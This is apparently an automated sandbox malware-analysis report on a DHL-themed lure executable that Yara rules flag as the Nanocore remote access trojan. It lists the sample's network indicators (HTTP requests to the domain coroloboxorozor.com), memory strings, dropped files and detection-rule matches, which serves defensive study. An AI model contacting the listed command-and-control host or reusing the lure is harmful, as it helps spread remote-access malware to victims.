Source: global traffic	HTTP traffic detected: GET /base/40146EDED8BA63D6AE3F2DAF99B02171.html HTTP/1.1Host: coroloboxorozor.com

Source: unknown

DNS traffic detected: queries for: coroloboxorozor.com

Source: DHL_document1102202068090891.exe, 00000000.00000003.369776362.0000000006F86000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2Assu
Source: DHL_document1102202068090891.exe, 00000000.00000002.522822282.00000000032AB000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.523044419.0000000003141000.00000004.00000001.sdmp	String found in binary or memory: http://coroloboxorozor.com
Source: DHL_document1102202068090891.exe, 00000000.00000002.522226985.0000000003231000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.523044419.0000000003141000.00000004.00000001.sdmp	String found in binary or memory: http://coroloboxorozor.com/base/40146EDED8BA63D6AE3F2DAF99B02171.html
Source: DHL_document1102202068090891.exe, 00000000.00000002.522226985.0000000003231000.00000004.00000001.sdmp	String found in binary or memory: http://coroloboxorozor.com/base/D9CFC9FB28456A5A139C9F495F1407BB.html
Source: DHL_document1102202068090891.exe, 00000000.00000002.522226985.0000000003231000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.523044419.0000000003141000.00000004.00000001.sdmp	String found in binary or memory: http://coroloboxorozor.com/base/F55ACED73ADD255559F0ED65FFDFD3E9.html
Source: powershell.exe, 00000012.00000002.520764725.0000000000C68000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: DHL_document1102202068090891.exe, 00000000.00000002.544063484.000000000460D000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.544010014.0000000004149000.00000004.00000001.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: DHL_document1102202068090891.exe, 00000000.00000002.544063484.000000000460D000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.544010014.0000000004149000.00000004.00000001.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: svchost.exe, 00000004.00000002.526127294.00000194BB814000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: DHL_document1102202068090891.exe, 00000000.00000003.369776362.0000000006F86000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: DHL_document1102202068090891.exe, 00000000.00000002.544063484.000000000460D000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.544010014.0000000004149000.00000004.00000001.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: DHL_document1102202068090891.exe, 00000000.00000002.544063484.000000000460D000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.544010014.0000000004149000.00000004.00000001.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: DHL_document1102202068090891.exe, 00000000.00000003.369776362.0000000006F86000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.dig
Source: svchost.exe, 00000004.00000002.526127294.00000194BB814000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: DHL_document1102202068090891.exe, 00000000.00000003.369776362.0000000006F86000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0O
Source: svchost.exe, 00000004.00000002.526127294.00000194BB814000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.msocsp.com0
Source: DHL_document1102202068090891.exe, 00000000.00000002.544063484.000000000460D000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.544010014.0000000004149000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 00000012.00000002.528890375.00000000048B3000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: svchost.exe, 00000004.00000002.511485026.00000194B60AF000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2
Source: svchost.exe, 00000004.00000002.511485026.00000194B60AF000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004
Source: svchost.exe, 00000004.00000002.528455496.00000194BBA00000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: DHL_document1102202068090891.exe, 00000000.00000002.522226985.0000000003231000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.523044419.0000000003141000.00000004.00000001.sdmp, powershell.exe, 00000012.00000002.528012031.0000000004771000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000012.00000002.528890375.00000000048B3000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: svchost.exe, 00000007.00000002.305629509.000002278FC13000.00000004.00000001.sdmp	String found in binary or memory: http://www.bingmapsportal.com
Source: powershell.exe, 0000000A.00000003.455029492.0000000009C2C000.00000004.00000001.sdmp	String found in binary or memory: http://www.microsoft.cN
Source: AdvancedRun.exe, AdvancedRun.exe, 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp, svchost.exe, 00000011.00000002.544010014.0000000004149000.00000004.00000001.sdmp	String found in binary or memory: http://www.nirsoft.net/
Source: svchost.exe, 00000005.00000002.508997125.0000022579443000.00000004.00000001.sdmp	String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 00000005.00000002.508997125.0000022579443000.00000004.00000001.sdmp	String found in binary or memory: https://%s.xboxlive.com
Source: svchost.exe, 00000005.00000002.508997125.0000022579443000.00000004.00000001.sdmp	String found in binary or memory: https://activity.windows.com
Source: svchost.exe, 00000007.00000003.305361825.000002278FC5F000.00000004.00000001.sdmp	String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 00000005.00000002.508997125.0000022579443000.00000004.00000001.sdmp	String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000005.00000002.508997125.0000022579443000.00000004.00000001.sdmp	String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000007.00000003.305387105.000002278FC49000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000007.00000003.305361825.000002278FC5F000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 00000007.00000002.305652333.000002278FC3D000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 00000007.00000003.305361825.000002278FC5F000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 00000007.00000002.305661530.000002278FC4E000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 00000007.00000003.283577676.000002278FC2F000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000007.00000003.283577676.000002278FC2F000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 00000007.00000002.305652333.000002278FC3D000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 00000007.00000003.305361825.000002278FC5F000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 00000007.00000003.305361825.000002278FC5F000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 00000007.00000003.305361825.000002278FC5F000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 00000007.00000003.283577676.000002278FC2F000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
Source: svchost.exe, 00000007.00000003.305403663.000002278FC40000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 00000007.00000003.305403663.000002278FC40000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 00000007.00000003.305361825.000002278FC5F000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 00000007.00000002.305658651.000002278FC4B000.00000004.00000001.sdmp, svchost.exe, 00000007.00000003.305403663.000002278FC40000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 00000007.00000003.283577676.000002278FC2F000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?entry=
Source: svchost.exe, 00000007.00000003.305387105.000002278FC49000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 00000007.00000002.305658651.000002278FC4B000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000007.00000002.305658651.000002278FC4B000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000007.00000002.305661530.000002278FC4E000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.t
Source: svchost.exe, 00000007.00000003.305361825.000002278FC5F000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 00000007.00000003.283577676.000002278FC2F000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.305652333.000002278FC3D000.00000004.00000001.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000007.00000003.283577676.000002278FC2F000.00000004.00000001.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: powershell.exe, 0000000A.00000003.396400202.0000000005CBE000.00000004.00000001.sdmp	String found in binary or memory: https://go.micro
Source: DHL_document1102202068090891.exe, 00000000.00000002.544063484.000000000460D000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.544010014.0000000004149000.00000004.00000001.sdmp	String found in binary or memory: https://sectigo.com/CPS0C
Source: DHL_document1102202068090891.exe, 00000000.00000002.544063484.000000000460D000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.544010014.0000000004149000.00000004.00000001.sdmp	String found in binary or memory: https://sectigo.com/CPS0D
Source: svchost.exe, 00000007.00000002.305652333.000002278FC3D000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 00000007.00000002.305652333.000002278FC3D000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.305629509.000002278FC13000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 00000007.00000003.305400692.000002278FC45000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000007.00000003.305400692.000002278FC45000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000007.00000003.283577676.000002278FC2F000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 00000007.00000003.283577676.000002278FC2F000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 00000007.00000002.305661530.000002278FC4E000.00000004.00000001.sdmp	String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
Source: DHL_document1102202068090891.exe, 00000000.00000003.369776362.0000000006F86000.00000004.00000001.sdmp	String found in binary or memory: https://www.digicert.com/CPS0

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Source: svchost.exe, 00000011.00000002.513166260.0000000001200000.00000004.00000001.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 0000001D.00000002.529223776.0000000002D91000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.504221137.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.533736388.0000000003DD9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.543251582.00000000047D4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.544943741.000000000430F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.540084949.0000000005AE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.544960546.00000000047D2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 6560, type: MEMORY
Source: Yara match	File source: 28.2.svchost.exe.4806e98.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DHL_document1102202068090891.exe.47d29a0.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.CasPol.exe.3ddff94.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.CasPol.exe.5ae0000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.CasPol.exe.3ddb15e.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.CasPol.exe.3ddff94.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.CasPol.exe.3de45bd.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.svchost.exe.4341dc8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.CasPol.exe.5ae4629.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.svchost.exe.4341dc8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.svchost.exe.4806e98.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.CasPol.exe.5ae0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DHL_document1102202068090891.exe.48057c0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DHL_document1102202068090891.exe.47d29a0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DHL_document1102202068090891.exe.48057c0.7.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 0000001D.00000002.504221137.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000001D.00000002.504221137.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001D.00000002.533736388.0000000003DD9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001C.00000002.543251582.00000000047D4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000001C.00000002.543251582.00000000047D4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000011.00000002.544943741.000000000430F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000011.00000002.544943741.000000000430F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001D.00000002.539788145.0000000005370000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000001D.00000002.540084949.0000000005AE0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000002.544960546.00000000047D2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000002.544960546.00000000047D2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: svchost.exe PID: 6560, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: svchost.exe PID: 6560, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 28.2.svchost.exe.4806e98.6.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 28.2.svchost.exe.4806e98.6.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.DHL_document1102202068090891.exe.47d29a0.8.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.DHL_document1102202068090891.exe.47d29a0.8.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 29.2.CasPol.exe.3ddff94.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 29.2.CasPol.exe.5ae0000.9.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 29.2.CasPol.exe.3ddb15e.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 29.2.CasPol.exe.3ddb15e.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 29.2.CasPol.exe.3ddff94.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 29.2.CasPol.exe.2dfb8c8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 29.2.CasPol.exe.3de45bd.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 29.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 29.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 17.2.svchost.exe.4341dc8.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 17.2.svchost.exe.4341dc8.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 29.2.CasPol.exe.5370000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 29.2.CasPol.exe.5ae4629.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 17.2.svchost.exe.4341dc8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 17.2.svchost.exe.4341dc8.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 28.2.svchost.exe.4806e98.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 28.2.svchost.exe.4806e98.6.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 29.2.CasPol.exe.5ae0000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.DHL_document1102202068090891.exe.48057c0.7.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.DHL_document1102202068090891.exe.48057c0.7.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.DHL_document1102202068090891.exe.47d29a0.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.DHL_document1102202068090891.exe.47d29a0.8.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.DHL_document1102202068090891.exe.48057c0.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.DHL_document1102202068090891.exe.48057c0.7.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>

Executable has a suspicious name (potential lure to open the executable)

Show sources

Source: DHL_document1102202068090891.exe

Static file information: Suspicious name

Initial sample is a PE file and has a suspicious name

Show sources

Source: initial sample

Static PE information: Filename: DHL_document1102202068090891.exe

Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe

Code function: 0_2_069D6998 NtSetInformationThread,

0_2_069D6998

Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe

File created: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh

Jump to behavior

Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Code function: 0_2_0172C328	0_2_0172C328
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Code function: 0_2_0172EDE3	0_2_0172EDE3
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Code function: 0_2_0172EDE8	0_2_0172EDE8
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Code function: 0_2_069D0040	0_2_069D0040
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Code function: 0_2_069D8D10	0_2_069D8D10
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Code function: 0_2_069D9A70	0_2_069D9A70
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Code function: 0_2_069D0006	0_2_069D0006
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Code function: 0_2_06CD0040	0_2_06CD0040
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Code function: 17_2_0566C328	17_2_0566C328
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 18_2_00918198	18_2_00918198
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 18_2_00916258	18_2_00916258
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 18_2_00913318	18_2_00913318
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 18_2_00914478	18_2_00914478
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 18_2_00910040	18_2_00910040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 18_2_00919F58	18_2_00919F58
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 18_2_00E1D220	18_2_00E1D220
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 18_2_00E1619C	18_2_00E1619C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 18_2_00E1DD88	18_2_00E1DD88
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 18_2_00E1DD78	18_2_00E1DD78
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Code function: 28_2_0574C328	28_2_0574C328
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Code function: 28_2_0574EB90	28_2_0574EB90

Source: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe

Code function: String function: 0040B550 appears 50 times

Source: unknown

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 5308 -ip 5308

Source: DHL_document1102202068090891.exe

Static PE information: invalid certificate

Source: AdvancedRun.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: AdvancedRun.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: DHL_document1102202068090891.exe, 00000000.00000002.542947767.0000000004239000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameRunPeBraba.dll6 vs DHL_document1102202068090891.exe
Source: DHL_document1102202068090891.exe, 00000000.00000002.520762387.0000000001820000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemscorrc.dllT vs DHL_document1102202068090891.exe
Source: DHL_document1102202068090891.exe, 00000000.00000002.504969739.0000000000F00000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameGecvcAeU.exe2 vs DHL_document1102202068090891.exe
Source: DHL_document1102202068090891.exe, 00000000.00000002.552836368.0000000006CF0000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs DHL_document1102202068090891.exe
Source: DHL_document1102202068090891.exe, 00000000.00000002.553111281.0000000006DE0000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs DHL_document1102202068090891.exe
Source: DHL_document1102202068090891.exe, 00000000.00000002.553111281.0000000006DE0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs DHL_document1102202068090891.exe
Source: DHL_document1102202068090891.exe, 00000000.00000002.544063484.000000000460D000.00000004.00000001.sdmp	Binary or memory string: ,@shell32.dllSHGetSpecialFolderPathWshlwapi.dllSHAutoComplete%2.2X%2.2X%2.2X<>"°&<br><font size="%d" color="#%s"><b></b>\StringFileInfo\\VarFileInfo\Translation%4.4X%4.4X040904E4ProductNameFileDescriptionFileVersionProductVersionCompanyNameInternalNameLegalCopyrightOriginalFileNameRSDSu vs DHL_document1102202068090891.exe
Source: DHL_document1102202068090891.exe, 00000000.00000002.544063484.000000000460D000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameAdvancedRun.exe8 vs DHL_document1102202068090891.exe
Source: DHL_document1102202068090891.exe, 00000000.00000002.544960546.00000000047D2000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameMlZW NWd.exe2 vs DHL_document1102202068090891.exe

Source: C:\Windows\System32\svchost.exe	Section loaded: xboxlivetitleid.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cdpsgshims.dll			Jump to behavior

Source: 0000001D.00000002.504221137.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000001D.00000002.504221137.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000001D.00000002.533736388.0000000003DD9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000001C.00000002.543251582.00000000047D4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000001C.00000002.543251582.00000000047D4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000011.00000002.544943741.000000000430F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000011.00000002.544943741.000000000430F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
